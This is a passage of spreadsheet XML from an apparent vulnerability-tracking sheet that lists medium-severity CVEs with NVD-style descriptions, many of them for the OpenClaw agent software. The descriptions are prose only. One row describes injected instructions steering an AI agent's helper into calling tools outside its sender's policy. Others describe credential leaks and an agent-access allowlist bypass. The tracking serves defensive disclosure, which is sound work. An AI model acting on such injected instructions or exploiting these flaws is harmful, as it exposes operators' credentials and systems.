      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100569</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed application. In versions &gt;= 2026.4.25 and &lt; 2026.8.1, the workspace environment-variable filter did not block variables ending in `_ENDPOINT`, so an untrusted workspace `.env` file could set AZURE_SPEECH_ENDPOINT. Azure Speech preferred that value over the configured region, so when a synthesis or voice-list request was made, the attacker-selected endpoint received the operator's Azure Speech key in the request header, allowing the key to be reused against the operator's Azure Speech resource. Exploitation requires an operator to start OpenClaw in attacker-controlled workspace content with Azure Speech configured with a key and region and no trusted endpoint override set. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100569</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12037</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>The Asset CleanUp: Page Speed Booster plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.4.0.5 via the 'page_url' parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This vulnerability is only reachable when the plugin's dom_get_type setting has been configured to 'wp_remote_post' by an administrator.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12037</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97877</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-255, CWE-259</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in zhistaredu StarTraining up to 3.8.1. This issue affects the function UserLoginService.createToken of the file application.yml of the component JWT Token Handler. This manipulation of the argument user_id/company_id causes use of hard-coded password. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97877</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100303</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 lacks authorization checks on FormThemeController write endpoints for global form themes and categories. Authenticated non-admin users can add, modify, or delete themes and theme categories affecting forms owned by other users.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100303</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100388</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>RustDesk versions before 1.5.0 fail to properly validate file transfer permissions on incoming file clipboard messages in the Cliprdr message handler on Linux and macOS. Authenticated remote peers with disabled file transfer permissions can place files onto the host clipboard and retrieve copied files and contents from the process-wide clipboard cache.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100388</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100524</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in the extensions manager that allows attackers to perform state-changing actions without anti-CSRF token validation. Attackers can craft links or embed images to force administrators to install, update, pause, or unpause extensions by tricking them into visiting a malicious page while authenticated.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100524</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100528</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 could send third-party provider credentials to the wrong endpoint. In affected versions, when a third-party provider uses an OpenAI-compatible API and the resolved model metadata lacks a concrete base URL, a pinned session that continues after a model configuration hot reload retains that provider's credential while the OpenAI SDK selects its own default endpoint. A resulting request could disclose the configured third-party provider credential to an unrelated provider endpoint and fail with a misleading authentication error. Operators who observed this condition should rotate the affected credential. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100528</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100549</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a path traversal vulnerability in QQBot voice attachment handling where filenames are decoded twice, allowing encoded traversal segments to reappear after sanitization. Attackers can supply crafted voice attachments that write files outside the intended staging directory to other process-writable locations.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100549</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100550</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains an access-control bypass in the Microsoft Teams integration. When groupPolicy is set to allowlist, a missing or unsupported configured access group produces a denied group-resolution result that is not rejected by the final message-admission check, so a Teams member who is not on the allowlist can still trigger the configured agent despite the administrator's group boundary. The impact depends on the conversations, tools, and data available to that agent. The issue is fixed in version 2026.8.1.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100550</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100563</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 does not neutralize leading characters that spreadsheet applications interpret as formulas when the Control UI exports session data to CSV. Although session labels were quoted as CSV text, a lower-trust participant who can influence a session label or the first user message can place a formula-like cell in the Usage export; if an operator opens that export in a spreadsheet application with formula evaluation enabled, the cell may be evaluated with the permissions of the spreadsheet user. OpenClaw itself does not evaluate the formula, and practical impact depends on the spreadsheet application's security settings. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100563</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100593</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 does not enforce the documented owner-only requirement for persistent `/activation` policy changes in group channels. An authorized non-owner channel sender can change whether the agent requires mention-based activation, causing the agent to respond more broadly in the group (exposing its responses to additional group traffic) or suppressing expected activation behavior until an owner restores the intended setting. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100593</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93366</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains an authorization bypass vulnerability that allows authenticated users with the Author role to enumerate and delete media files belonging to pages owned by other users, including administrators, by supplying arbitrary uuid parameters to unprotected AJAX endpoints. Attackers can retrieve page UUIDs for all users via the content-get-list endpoint and then submit crafted POST requests to the list-images and delete-image endpoints in bl-kernel/ajax/ to access and destroy media files outside their own pages, bypassing the IMAGE_RESTRICT isolation control.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93366</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100526</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Discord integration (npm package @openclaw/discord) before version 2026.9.3 could lose the sender-scoped media policy in the emoji and sticker upload actions before loading a local file. A sender permitted to invoke those actions could cause OpenClaw to read a host path that the same sender's configured media roots would otherwise reject, placing bytes from an out-of-policy local file into an outbound emoji or sticker upload. Exploitation requires access to the guild asset action and knowledge or derivation of a useful local path; the issue does not permit unrestricted filesystem browsing or code execution. The issue is fixed in @openclaw/discord 2026.9.3.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100526</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100545</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.8.1 incorrectly enforces sender tool policies during session-memory filename generation. In affected versions, filename generation created an embedded helper that retained tools which the originating sender's policy had removed. When session-memory filename generation was enabled for an agent reachable by lower-trust senders, model-mediated instructions could cause the helper to invoke tools outside that sender's effective policy; the demonstrated impact was the creation of persistent scheduled work. Exploitability depends on the model acting on the injected instruction and on which tools the helper exposes. The issue is fixed in 2026.8.1; as a workaround, disable session-memory filename generation for agents reachable by lower-trust senders.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100545</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100548</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 contain a credential exposure issue in memory embedding failover. When remote embedding fallback is configured and the primary embedding provider fails, the request can be sent to a different fallback provider while still reusing the primary provider's configured API key, causing that credential to be transmitted as a bearer token to an unintended vendor. The practical impact depends on the configured providers, whether failover occurs, and the privileges attached to the primary provider key. The issue is fixed in 2026.8.1; as a workaround, disable cross-provider embedding fallback or configure each provider with separate, narrowly scoped credentials.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100548</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
